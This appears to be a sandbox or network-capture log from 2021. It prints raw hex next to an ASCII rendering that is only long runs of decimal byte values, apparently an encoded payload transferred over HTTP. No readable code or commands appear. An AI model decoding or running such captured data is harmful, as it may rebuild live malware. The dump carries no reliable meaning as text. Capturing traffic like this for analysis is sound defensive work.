                                                                                              2021-09-27 18:28:01 UTC3529INData Raw: 20 31 30 31 20 31 30 30 20 32 20 31 30 37 20 31 36 20 31 35 31 20 32 33 20 31 37 36 20 35 39 20 32 30 38 20 31 33 37 20 31 34 39 20 31 32 30 20 31 34 31 20 31 34 39 20 31 35 32 20 38 39 20 32 30 34 20 37 34 20 31 31 37 20 37 30 20 31 30 33 20 31 38 30 20 31 32 38 20 33 30 20 31 37 35 20 32 31 30 20 31 34 32 20 33 31 20 33 38 20 38 32 20 31 38 34 20 32 34 31 20 35 34 20 32 34 33 20 38 33 20 31 39 37 20 32 32 34 20 31 32 32 20 31 34 33 20 31 34 35 20 32 31 30 20 32 32 31 20 32 34 39 20 31 38 34 20 32 33 38 20 37 38 20 32 34 30 20 38 36 20 32 31 38 20 34 38 20 34 35 20 32 34 36 20 31 38 31 20 32 33 36 20 37 37 20 33 39 20 31 30 32 20 32 30 31 20 31 32 36 20 32 33 35 20 32 30 39 20 32 33 30 20 31 37 30 20 33 30 20 32 32 30 20 35 36 20 36 34 20 32 34 33 20 36
                                                                                              Data Ascii: 101 100 2 107 16 151 23 176 59 208 137 149 120 141 149 152 89 204 74 117 70 103 180 128 30 175 210 142 31 38 82 184 241 54 243 83 197 224 122 143 145 210 221 249 184 238 78 240 86 218 48 45 246 181 236 77 39 102 201 126 235 209 230 170 30 220 56 64 243 6
                                                                                              2021-09-27 18:28:01 UTC3533INData Raw: 20 31 39 39 20 32 32 30 20 37 38 20 31 34 33 20 32 34 33 20 35 33 20 35 33 20 31 31 34 20 32 33 35 20 32 30 39 20 32 34 31 20 39 38 20 31 32 33 20 31 38 30 20 32 32 39 20 31 37 36 20 31 38 33 20 31 39 31 20 32 32 34 20 36 31 20 31 32 34 20 35 32 20 31 34 31 20 31 34 37 20 39 20 32 35 30 20 31 35 36 20 39 37 20 31 30 37 20 32 32 30 20 31 32 36 20 32 35 20 32 32 32 20 36 32 20 38 35 20 31 36 20 32 30 35 20 32 31 34 20 38 35 20 32 33 37 20 32 32 20 32 35 34 20 31 38 34 20 31 32 37 20 37 38 20 31 30 33 20 35 36 20 31 39 38 20 31 34 20 31 31 38 20 31 34 33 20 31 34 35 20 31 32 34 20 31 33 20 39 36 20 34 37 20 32 30 38 20 33 33 20 31 31 35 20 31 32 31 20 31 31 38 20 31 33 37 20 32 34 37 20 37 30 20 31 33 31 20 38 31 20 31 32 32 20 31 20 32 38 20 38 30 20 31 31
                                                                                              Data Ascii: 199 220 78 143 243 53 53 114 235 209 241 98 123 180 229 176 183 191 224 61 124 52 141 147 9 250 156 97 107 220 126 25 222 62 85 16 205 214 85 237 22 254 184 127 78 103 56 198 14 118 143 145 124 13 96 47 208 33 115 121 118 137 247 70 131 81 122 1 28 80 11
                                                                                              2021-09-27 18:28:01 UTC3537INData Raw: 36 34 20 31 31 37 20 32 33 35 20 32 30 39 20 38 36 20 37 30 20 35 20 32 33 32 20 31 39 31 20 32 33 30 20 32 31 30 20 32 32 33 20 32 34 30 20 38 37 20 35 35 20 33 39 20 31 35 34 20 38 30 20 35 38 20 32 33 32 20 32 32 32 20 37 34 20 31 35 34 20 34 36 20 32 30 37 20 31 34 35 20 39 32 20 31 39 30 20 30 20 32 34 38 20 31 35 33 20 32 33 34 20 32 35 34 20 31 33 30 20 38 34 20 39 39 20 34 39 20 32 30 34 20 32 33 20 32 30 35 20 32 31 34 20 39 33 20 31 32 30 20 39 36 20 32 30 31 20 32 33 35 20 33 35 20 32 31 32 20 31 38 32 20 38 34 20 34 39 20 38 35 20 35 37 20 31 39 30 20 38 31 20 35 37 20 31 35 33 20 34 39 20 32 30 32 20 32 30 36 20 31 37 37 20 32 32 32 20 32 33 33 20 31 37 35 20 31 31 30 20 31 38 33 20 31 35 31 20 31 36 32 20 37 37 20 32 34 30 20 36 30 20 31 31
                                                                                              Data Ascii: 64 117 235 209 86 70 5 232 191 230 210 223 240 87 55 39 154 80 58 232 222 74 154 46 207 145 92 190 0 248 153 234 254 130 84 99 49 204 23 205 214 93 120 96 201 235 35 212 182 84 49 85 57 190 81 57 153 49 202 206 177 222 233 175 110 183 151 162 77 240 60 11
                                                                                              2021-09-27 18:28:01 UTC3540INData Raw: 32 36 20 31 35 20 31 31 32 20 35 30 20 34 38 20 36 20 33 38 20 38 35 20 31 31 34 20 38 35 20 31 30 39 20 31 31 32 20 35 30 20 31 39 20 31 30 33 20 31 30 31 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 34 38 20 35 30 20 35 35 20 33 20 32 30 35 20 32 31 35 20 31 31 34 20 31 32 31 20 34 35 20 34 38 20 35 30 20 35 34 20 31 37 34 20 31 31 35 20 37 30 20 31 30 39 20 31 31 34 20 35 30 20 34 38 20 35 31 20 35 34 20 38 34 20 31 31 34 20 31 36 35 20 31 30 39 20 31 31 32 20 35 30 20 31 31 39 20 35 30 20 35 34 20 38 34 20 31 36 35 20 31 31 37 20 31 30 39 20 31 31 32 20 32 32 36 20 34 39 20 35 30 20 35 34 20 31 35 32 20 31 31 35 20 31 31 37 20 31 30 39 20 31 31 39 20 35 30 20 34 38 20 35 30 20 32 30 30 20 38 35 20 31 31 34 20 31 31 37 20 31 32
                                                                                              Data Ascii: 26 15 112 50 48 6 38 85 114 85 109 112 50 19 103 101 84 114 117 109 112 48 48 50 55 3 205 215 114 121 45 48 50 54 174 115 70 109 114 50 48 51 54 84 114 165 109 112 50 119 50 54 84 165 117 109 112 226 49 50 54 152 115 117 109 119 50 48 50 200 85 114 117 12
                                                                                              2021-09-27 18:28:01 UTC3544INData Raw: 20 33 32 20 34 38 20 36 30 20 35 39 20 31 38 38 20 31 32 36 20 31 30 33 20 31 30 39 20 38 37 20 36 33 20 32 31 36 20 36 32 20 34 38 20 38 34 20 34 39 20 31 32 30 20 31 33 33 20 31 32 34 20 35 32 20 34 38 20 31 32 34 20 35 39 20 31 38 38 20 31 32 36 20 31 31 35 20 31 30 39 20 33 36 20 36 33 20 32 31 36 20 36 32 20 34 38 20 38 34 20 31 36 20 31 32 30 20 31 33 33 20 31 32 34 20 35 32 20 34 38 20 39 33 20 35 39 20 31 33 20 31 31 34 20 31 31 35 20 31 30 39 20 32 34 35 20 36 33 20 31 30 35 20 35 30 20 34 38 20 38 34 20 32 35 32 20 31 32 30 20 35 32 20 31 31 32 20 35 32 20 34 38 20 31 36 31 20 35 39 20 31 33 20 31 31 34 20 31 31 35 20 31 30 39 20 32 33 34 20 36 33 20 31 30 35 20 35 30 20 34 38 20 38 34 20 32 31 31 20 31 32 30 20 35 32 20 31 31 32 20 35 32 20 34
                                                                                              Data Ascii: 32 48 60 59 188 126 103 109 87 63 216 62 48 84 49 120 133 124 52 48 124 59 188 126 115 109 36 63 216 62 48 84 16 120 133 124 52 48 93 59 13 114 115 109 245 63 105 50 48 84 252 120 52 112 52 48 161 59 13 114 115 109 234 63 105 50 48 84 211 120 52 112 52 4
                                                                                              2021-09-27 18:28:01 UTC3549INData Raw: 33 20 35 30 20 31 31 31 20 37 39 20 37 20 31 31 37 20 31 32 33 20 31 31 32 20 32 34 33 20 34 35 20 31 35 32 20 35 34 20 36 36 20 31 31 34 20 31 33 32 20 31 31 32 20 32 31 38 20 35 30 20 35 34 20 35 30 20 34 37 20 31 31 36 20 32 30 35 20 31 31 37 20 31 30 37 20 31 31 32 20 37 20 31 36 20 32 34 36 20 35 34 20 38 32 20 31 31 34 20 33 36 20 37 37 20 31 38 33 20 35 30 20 35 34 20 35 30 20 31 31 31 20 31 31 37 20 31 38 31 20 31 31 37 20 31 30 37 20 31 31 32 20 32 30 39 20 31 38 20 35 36 20 35 35 20 38 32 20 31 31 34 20 31 33 38 20 37 39 20 31 38 30 20 35 30 20 35 34 20 35 30 20 34 35 20 31 31 39 20 32 30 35 20 31 31 37 20 31 30 37 20 31 31 32 20 35 20 31 39 20 31 35 32 20 35 34 20 38 32 20 31 31 34 20 33 38 20 37 38 20 31 32 37 20 35 31 20 35 34 20 35 30 20 38
                                                                                              Data Ascii: 3 50 111 79 7 117 123 112 243 45 152 54 66 114 132 112 218 50 54 50 47 116 205 117 107 112 7 16 246 54 82 114 36 77 183 50 54 50 111 117 181 117 107 112 209 18 56 55 82 114 138 79 180 50 54 50 45 119 205 117 107 112 5 19 152 54 82 114 38 78 127 51 54 50 8
                                                                                              2021-09-27 18:28:01 UTC3553INData Raw: 39 20 32 34 30 20 32 30 20 31 35 31 20 31 33 20 34 39 20 38 32 20 31 31 36 20 34 20 37 20 34 39 20 35 35 20 31 30 32 20 31 37 38 20 32 20 32 34 33 20 35 34 20 31 31 34 20 35 39 20 32 34 30 20 31 31 34 20 31 35 31 20 31 31 38 20 34 39 20 32 20 32 34 32 20 36 30 20 32 30 32 20 35 32 20 35 33 20 31 30 32 20 31 37 38 20 31 30 33 20 32 34 33 20 35 34 20 31 31 34 20 36 31 20 38 30 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 31 34 39 20 31 31 37 20 39 39 20 35 30 20 34 39 20 35 30 20 31 33 34 20 31 31 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 35 20 34 30 20 35 38 20 34 34 20 31 36 20 31 31 34 20 31 31 39 20 31 30 39 20 31 31 36 20 31 39 20 34 38 20 35 30 20 35 34 20 38 34 20 39 37 20 31 31 37 20 39 38 20 31 30 36 20 31 32 32 20 34
                                                                                              Data Ascii: 9 240 20 151 13 49 82 116 4 7 49 55 102 178 2 243 54 114 59 240 114 151 118 49 2 242 60 202 52 53 102 178 103 243 54 114 61 80 50 48 50 54 66 114 149 117 99 50 49 50 134 116 114 117 109 112 35 40 58 44 16 114 119 109 116 19 48 50 54 84 97 117 98 106 122 4
                                                                                              2021-09-27 18:28:01 UTC3557INData Raw: 38 34 20 31 38 20 36 34 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 38 34 20 35 33 20 31 30 38 20 36 36 20 32 30 32 20 31 30 38 20 36 32 20 35 30 20 32 34 38 20 37 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 20 31 31 35 20 37 35 20 30 20 32 34 37 20 35 35 20 34 20 31 31 34 20 32 39 20 39 31 20 31 31 32 20 35 30 20 34 38 20 35 30 20 38 30 20 38 37 20 32 30 30 20 36 39 20 31 30 34 20 31 31 33 20 39 36 20 34 38 20 32 31 30 20 30 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 32 32 20 34 39 20 32 31 30 20 32 20 31 31 20 38 35 20 33 33 20 31 31 37 20 39 33 20 37 31 20 35 30 20 34 38 20 35 30 20 35 34 20 35 30 20 31 31 33 20 31 35 35 20 39 33 20 31 38 37 20 35 31 20 31 30 30 20 35 30 20 32 33 30 20 39 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32
                                                                                              Data Ascii: 84 18 64 109 112 50 48 84 53 108 66 202 108 62 50 248 7 54 84 114 117 11 115 75 0 247 55 4 114 29 91 112 50 48 50 80 87 200 69 104 113 96 48 210 0 84 114 117 109 22 49 210 2 11 85 33 117 93 71 50 48 50 54 50 113 155 93 187 51 100 50 230 99 114 117 109 112
                                                                                              2021-09-27 18:28:01 UTC3561INData Raw: 33 31 20 31 39 31 20 31 31 39 20 32 32 39 20 31 31 32 20 36 20 38 34 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 30 30 20 31 30 39 20 39 33 20 31 32 36 20 36 34 20 34 38 20 31 38 38 20 38 34 20 37 34 20 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 33 35 20 35 34 20 34 35 20 36 32 20 35 20 31 31 31 20 32 35 31 20 35 30 20 31 32 20 38 36 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 32 34 20 31 31 32 20 32 34 37 20 31 32 34 20 32 31 38 20 35 32 20 32 31 36 20 31 31 34 20 31 20 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 33 32 20 38 34 20 39 35 20 35 36 20 31 35 37 20 31 31 34 20 31 38 38 20 34 38 20 32 31 38 20 38 32 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 31 32 39 20 31 32 37 20 32 30 34 20 38 36 20 32 32 37 20 31 31
                                                                                              Data Ascii: 31 191 119 229 112 6 84 50 54 84 114 100 109 93 126 64 48 188 84 74 17 109 112 50 48 35 54 45 62 5 111 251 50 12 86 54 84 114 117 124 112 247 124 218 52 216 114 1 9 112 50 48 50 32 84 95 56 157 114 188 48 218 82 84 114 117 109 102 50 129 127 204 86 227 11
                                                                                              2021-09-27 18:28:01 UTC3565INData Raw: 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 31 38 30 20 34 38 20 33 35 20 39 32 20 33 30 20 31 31 38 20 31 31 32 20 31 30 38 20 31 30 38 20 31 38 32 20 34 38 20 35 30 20 35 34 20 38 34 20 32 34 34 20 31 30 39 20 31 35 38 20 31 30 36 20 38 35 20 34 38 20 35 32 20 35 35 20 31 36 20 32 34 36 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 38 32 20 34 32 20 31 39 37 20 37 38 20 32 33 34 20 31 31 36 20 31 30 37 20 31 31 33 20 31 37 30 20 31 38 30 20 35 30 20 35 34 20 38 34 20 31 31 34 20 32 34 33 20 31 30 39 20 31 32 31 20 38 39 20 31 37 32 20 35 30 20 34 39 20 38 35 20 31 39 38 20 32 34 31 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 31 37 39 20 35 34 20 31 30 39 20 32 35 20 31 38 20 31 30 39 20 31 31 39 20 35 31 20 31 38 30 20 31 38 33 20 35 34
                                                                                              Data Ascii: 5 114 117 109 112 180 48 35 92 30 118 112 108 108 182 48 50 54 84 244 109 158 106 85 48 52 55 16 246 117 109 112 50 182 42 197 78 234 116 107 113 170 180 50 54 84 114 243 109 121 89 172 50 49 85 198 241 109 112 50 48 179 54 109 25 18 109 119 51 180 183 54
                                                                                              2021-09-27 18:28:01 UTC3569INData Raw: 31 30 20 31 35 37 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 32 20 35 30 20 38 31 20 31 37 37 20 31 31 30 20 38 31 20 37 39 20 31 31 36 20 39 20 32 31 39 20 35 30 20 34 38 20 35 30 20 35 34 20 36 36 20 31 31 34 20 32 33 36 20 32 33 38 20 34 36 20 35 35 20 31 34 20 35 31 20 31 37 38 20 32 35 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 36 20 34 38 20 31 33 35 20 31 38 31 20 34 39 20 31 31 39 20 37 34 20 31 30 38 20 31 37 36 20 31 35 33 20 34 38 20 35 30 20 35 34 20 38 34 20 31 30 30 20 31 31 37 20 31 32 38 20 32 34 33 20 39 34 20 35 33 20 31 31 34 20 35 35 20 35 32 20 32 32 32 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 35 34 20 34 32 20 31 39 37 20 37 38 20 31 37 32 20 31 31 37 20 34 36 20 31 31 33 20 31 38 32 20 31 35 36 20 35
                                                                                              Data Ascii: 10 157 84 114 117 109 102 50 81 177 110 81 79 116 9 219 50 48 50 54 66 114 236 238 46 55 14 51 178 255 114 117 109 112 36 48 135 181 49 119 74 108 176 153 48 50 54 84 100 117 128 243 94 53 114 55 52 222 117 109 112 50 54 42 197 78 172 117 46 113 182 156 5
                                                                                              2021-09-27 18:28:01 UTC3572INData Raw: 35 30 20 34 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 31 33 20 32 34 35 20 34 31 20 35 32 20 39 35 20 35 31 20 32 32 36 20 32 33 32 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 31 20 34 38 20 31 30 36 20 31 37 34 20 35 33 20 31 31 36 20 34 20 31 30 38 20 31 36 38 20 31 34 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 36 20 31 31 37 20 31 36 35 20 32 33 32 20 39 31 20 35 34 20 37 30 20 35 35 20 32 32 30 20 32 30 35 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 39 20 35 30 20 35 34 20 32 30 35 20 32 31 20 31 31 37 20 32 34 20 31 31 33 20 31 33 38 20 32 34 30 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 35 20 31 30 39 20 36 34 20 31 37 31 20 38 37 20 35 30 20 36 37 20 38 35 20 31 35 30 20 31 38 30 20 31 30 39 20 31 31 32 20 35 30 20
                                                                                              Data Ascii: 50 48 50 54 85 114 113 245 41 52 95 51 226 232 114 117 109 112 51 48 106 174 53 116 4 108 168 140 48 50 54 84 116 117 165 232 91 54 70 55 220 205 117 109 112 50 49 50 54 205 21 117 24 113 138 240 50 54 84 114 115 109 64 171 87 50 67 85 150 180 109 112 50
                                                                                              2021-09-27 18:28:01 UTC3576INData Raw: 38 20 31 31 32 20 31 37 35 20 39 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 35 36 20 38 34 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 38 33 20 31 31 30 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 33 39 20 31 30 20 35 30 20 35 34 20 38 36 20 31 31 34 20 31 36 30 20 38 37 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 32 33 20 31 30 36 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 37 31 20 31 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 39 36 20 38 32 20 31 31 32 20 35 30 20 34 39 20 35 30 20 38 37 20 31 30 37 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 32 33 39 20 31 35 20 35 30 20 35 34 20 38 35 20 31 31 34 20 36 34 20 34 34 20 31 31 32 20 35 30 20 35 30 20 35 30 20 31 30 33 20 32 31 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31
                                                                                              Data Ascii: 8 112 175 9 50 54 85 114 156 84 112 50 49 50 183 110 114 117 108 112 139 10 50 54 86 114 160 87 112 50 49 50 123 106 114 117 108 112 171 14 50 54 85 114 96 82 112 50 49 50 87 107 114 117 108 112 239 15 50 54 85 114 64 44 112 50 50 50 103 21 114 117 110 11
                                                                                              2021-09-27 18:28:01 UTC3581INData Raw: 32 20 35 31 20 31 30 34 20 35 30 20 35 34 20 38 35 20 31 31 34 20 36 30 20 33 31 20 31 31 32 20 35 30 20 34 39 20 35 30 20 38 33 20 33 38 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 37 39 20 36 36 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 38 38 20 33 30 20 31 31 32 20 35 30 20 34 39 20 35 30 20 35 35 20 33 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 32 37 20 36 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 32 34 30 20 32 35 20 31 31 32 20 35 30 20 35 30 20 35 30 20 31 35 31 20 33 32 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 31 34 33 20 36 38 20 35 30 20 35 34 20 38 30 20 31 31 34 20 31 37 32 20 32 35 20 31 31 32 20 35 30 20 35 33 20 35 30 20 31 39 35 20 33 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 33 31 20 36
                                                                                              Data Ascii: 2 51 104 50 54 85 114 60 31 112 50 49 50 83 38 114 117 111 112 179 66 50 54 85 114 188 30 112 50 49 50 55 32 114 117 108 112 127 68 50 54 85 114 240 25 112 50 50 50 151 32 114 117 110 112 143 68 50 54 80 114 172 25 112 50 53 50 195 32 114 117 108 112 31 6
                                                                                              2021-09-27 18:28:01 UTC3585INData Raw: 34 38 20 31 32 32 20 38 33 20 38 31 20 31 31 35 20 31 38 30 20 31 30 39 20 37 32 20 32 20 31 34 33 20 35 31 20 32 34 37 20 38 34 20 31 34 34 20 36 39 20 38 30 20 31 31 33 20 32 34 33 20 34 38 20 32 32 30 20 36 20 31 35 39 20 31 31 35 20 31 39 36 20 31 30 39 20 31 37 36 20 31 36 20 31 37 34 20 35 34 20 31 36 37 20 38 34 20 31 39 31 20 32 34 31 20 31 30 20 31 31 32 20 31 36 33 20 34 38 20 32 33 31 20 31 37 38 20 35 31 20 31 31 34 20 32 32 38 20 31 30 39 20 31 37 34 20 31 38 32 20 38 37 20 35 30 20 31 36 37 20 38 34 20 31 33 30 20 32 34 31 20 31 30 20 31 31 32 20 31 36 33 20 34 38 20 34 38 20 31 37 39 20 35 31 20 31 31 34 20 33 36 20 31 30 34 20 31 33 31 20 34 30 20 38 37 20 35 30 20 31 35 20 38 34 20 31 32 39 20 31 31 31 20 31 30 20 31 31 32 20 32 37 20 34
                                                                                              Data Ascii: 48 122 83 81 115 180 109 72 2 143 51 247 84 144 69 80 113 243 48 220 6 159 115 196 109 176 16 174 54 167 84 191 241 10 112 163 48 231 178 51 114 228 109 174 182 87 50 167 84 130 241 10 112 163 48 48 179 51 114 36 104 131 40 87 50 15 84 129 111 10 112 27 4
                                                                                              2021-09-27 18:28:01 UTC3589INData Raw: 20 36 34 20 31 31 33 20 31 38 37 20 35 33 20 31 39 33 20 34 34 20 32 30 30 20 31 32 37 20 32 32 38 20 31 30 34 20 31 32 33 20 31 35 39 20 31 34 38 20 36 33 20 33 31 20 38 32 20 39 39 20 32 31 36 20 31 20 31 31 34 20 32 35 31 20 34 39 20 31 39 33 20 34 34 20 38 31 20 31 31 35 20 31 32 34 20 31 31 31 20 38 34 20 31 35 39 20 39 32 20 34 38 20 32 35 35 20 38 35 20 37 35 20 32 31 36 20 31 30 34 20 31 31 33 20 32 35 31 20 34 39 20 31 32 34 20 31 35 35 20 38 31 20 31 31 35 20 31 38 30 20 31 30 38 20 33 39 20 31 35 39 20 31 33 30 20 36 33 20 39 35 20 38 31 20 34 37 20 32 31 36 20 31 37 34 20 31 32 35 20 39 31 20 35 33 20 38 34 20 31 35 35 20 31 35 37 20 31 32 37 20 34 34 20 31 30 34 20 32 33 37 20 34 36 20 32 35 35 20 36 33 20 31 31 31 20 38 31 20 32 20 32 31 36
                                                                                              Data Ascii: 64 113 187 53 193 44 200 127 228 104 123 159 148 63 31 82 99 216 1 114 251 49 193 44 81 115 124 111 84 159 92 48 255 85 75 216 104 113 251 49 124 155 81 115 180 108 39 159 130 63 95 81 47 216 174 125 91 53 84 155 157 127 44 104 237 46 255 63 111 81 2 216
                                                                                              2021-09-27 18:28:01 UTC3593INData Raw: 39 20 31 39 35 20 34 39 20 31 39 33 20 34 34 20 31 32 32 20 39 37 20 31 30 38 20 31 30 37 20 31 33 31 20 34 30 20 35 33 20 35 31 20 32 31 35 20 38 36 20 32 31 36 20 31 39 36 20 31 31 30 20 31 31 36 20 32 31 31 20 35 30 20 32 34 35 20 31 35 36 20 38 37 20 31 31 38 20 34 31 20 31 30 39 20 33 36 20 31 35 33 20 38 37 20 35 30 20 31 38 33 20 38 36 20 32 30 32 20 32 32 33 20 31 30 20 31 31 32 20 32 33 35 20 35 33 20 31 33 33 20 31 33 35 20 31 35 20 39 37 20 31 30 30 20 31 30 35 20 31 38 33 20 31 33 31 20 38 32 20 33 33 20 34 37 20 38 30 20 31 36 37 20 31 39 36 20 32 30 35 20 31 31 32 20 32 33 35 20 35 33 20 31 37 35 20 34 32 20 36 31 20 39 37 20 31 38 38 20 31 30 39 20 31 34 32 20 31 35 34 20 36 34 20 33 33 20 32 33 39 20 38 31 20 31 34 39 20 31 39 36 20 32 30
                                                                                              Data Ascii: 9 195 49 193 44 122 97 108 107 131 40 53 51 215 86 216 196 110 116 211 50 245 156 87 118 41 109 36 153 87 50 183 86 202 223 10 112 235 53 133 135 15 97 100 105 183 131 82 33 47 80 167 196 205 112 235 53 175 42 61 97 188 109 142 154 64 33 239 81 149 196 20
                                                                                              2021-09-27 18:28:01 UTC3604INData Raw: 34 39 20 33 31 20 39 31 20 34 36 20 33 31 20 39 34 20 39 32 20 38 37 20 38 35 20 33 32 20 32 37 20 32 36 20 33 20 33 20 35 30 20 31 31 35 20 39 33 20 39 31 20 33 36 20 32 39 20 32 37 20 38 20 33 30 20 37 30 20 34 38 20 39 37 20 37 39 20 33 39 20 36 20 31 36 20 30 20 39 34 20 31 31 33 20 39 35 20 39 35 20 37 30 20 35 39 20 32 38 20 31 36 20 33 20 34 20 31 32 37 20 39 35 20 38 36 20 38 33 20 35 36 20 31 31 34 20 34 38 20 39 20 32 35 20 37 30 20 39 35 20 36 34 20 31 31 36 20 33 38 20 32 39 20 32 20 33 30 20 31 37 20 38 30 20 39 32 20 38 37 20 31 31 39 20 33 32 20 36 20 37 20 34 20 31 38 20 37 31 20 36 38 20 38 37 20 35 34 20 31 37 20 32 32 20 32 38 20 32 35 20 33 31 20 36 34 20 31 31 34 20 36 34 20 38 39 20 33 35 20 31 20 32 30 20 31 35 20 32 38 20 38 37 20
                                                                                              Data Ascii: 49 31 91 46 31 94 92 87 85 32 27 26 3 3 50 115 93 91 36 29 27 8 30 70 48 97 79 39 6 16 0 94 113 95 95 70 59 28 16 3 4 127 95 86 83 56 114 48 9 25 70 95 64 116 38 29 2 30 17 80 92 87 119 32 6 7 4 18 71 68 87 54 17 22 28 25 31 64 114 64 89 35 1 20 15 28 87
                                                                                              2021-09-27 18:28:01 UTC3620INData Raw: 20 35 37 20 30 20 32 36 20 38 36 20 31 32 33 20 37 32 20 31 32 36 20 32 39 20 33 35 20 32 33 20 34 33 20 32 31 20 31 31 39 20 39 20 37 30 20 39 34 20 32 34 20 35 38 20 30 20 32 31 20 36 36 20 39 33 20 36 20 38 35 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 35 32 20 31 32 30 20 34 20 37 35 20 31 30 31 20 39 39 20 32 30 20 35 34 20 34 31 20 32 32 20 31 32 33 20 38 39 20 31 31 39 20 39 36 20 31 38 20 32 35 20 32 20 32 30 20 35 33 20 31 31 39 20 36 20 31 31 37 20 35 20 31 31 32 20 38 36 20 36 36 20 39 34 20 35 36 20 36 39 20 39 38 20 38 35 20 37 39 20 31 30 32 20 34 35 20 31 36 20 33 38 20 34 32 20 31 30 33 20 39 31 20 37 34 20 38 37 20 37 20 32 39 20 37 32 20 31 30 39 20 39 34 20 38 31 20 38 33 20 37 30 20 38 39 20 33 38 20 31 31 34 20 38 36 20 38 30 20
                                                                                              Data Ascii: 57 0 26 86 123 72 126 29 35 23 43 21 119 9 70 94 24 58 0 21 66 93 6 85 11 84 81 72 28 52 120 4 75 101 99 20 54 41 22 123 89 119 96 18 25 2 20 53 119 6 117 5 112 86 66 94 56 69 98 85 79 102 45 16 38 42 103 91 74 87 7 29 72 109 94 81 83 70 89 38 114 86 80
                                                                                              2021-09-27 18:28:01 UTC3636INData Raw: 35 33 20 35 31 20 37 32 20 38 30 20 31 31 32 20 31 37 20 31 33 20 36 37 20 31 30 31 20 31 30 38 20 33 20 36 38 20 34 33 20 39 20 31 32 30 20 36 37 20 39 32 20 34 20 31 31 20 37 20 33 30 20 33 38 20 32 34 20 37 20 31 32 37 20 31 32 34 20 31 31 36 20 32 31 20 33 38 20 31 38 20 38 30 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 35 31 20 36 38 20 36 38 20 33 32 20 31 37 20 31 30 30 20 38 39 20 31 32 33 20 36 36 20 31 30 33 20 35 35 20 37 20 34 37 20 32 36 20 37 31 20 31 31 33 20 32 20 31 32 30 20 31 30 39 20 34 32 20 37 20 32 36 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 31 36 20 35 37 20 34 37 20 35 37 20 39 33 20 31 32 31 20 31 30 36 20 31 31 31 20 32 36 20 32 30 20 36 33 20 31 20 36 37 20 37 34 20 39 20 31 32 36 20 31 32 36 20 33 37 20 34
                                                                                              Data Ascii: 53 51 72 80 112 17 13 67 101 108 3 68 43 9 120 67 92 4 11 7 30 38 24 7 127 124 116 21 38 18 80 77 50 19 15 71 51 68 68 32 17 100 89 123 66 103 55 7 47 26 71 113 2 120 109 42 7 26 77 15 48 17 11 37 16 57 47 57 93 121 106 111 26 20 63 1 67 74 9 126 126 37 4
                                                                                              2021-09-27 18:28:01 UTC3652INData Raw: 20 32 20 38 38 20 34 31 20 39 31 20 38 37 20 38 34 20 31 32 32 20 30 20 33 38 20 33 35 20 33 39 20 31 20 39 39 20 37 33 20 33 20 37 31 20 32 39 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 39 33 20 31 30 32 20 37 38 20 31 39 20 32 37 20 35 36 20 34 34 20 36 34 20 37 20 39 32 20 31 30 32 20 31 31 35 20 33 32 20 32 39 20 33 37 20 36 31 20 33 38 20 34 20 39 38 20 31 31 36 20 31 32 31 20 36 31 20 32 36 20 36 35 20 34 31 20 34 31 20 39 37 20 30 20 37 31 20 37 38 20 33 38 20 31 30 20 33 37 20 33 34 20 36 38 20 36 38 20 31 31 33 20 33 20 31 32 36 20 31 30 32 20 32 34 20 36 37 20 35 36 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 39 37 20 32 31 20 37 20 36 31 20 37 20 38 35 20 31 31 37 20 37 31 20 36 38 20 37 20 32 38 20 36 37 20 33 38 20 35 20 37 30 20
                                                                                              Data Ascii: 2 88 41 91 87 84 122 0 38 35 39 1 99 73 3 71 29 79 117 78 77 67 93 102 78 19 27 56 44 64 7 92 102 115 32 29 37 61 38 4 98 116 121 61 26 65 41 41 97 0 71 78 38 10 37 34 68 68 113 3 126 102 24 67 56 77 50 19 15 71 97 21 7 61 7 85 117 71 68 7 28 67 38 5 70
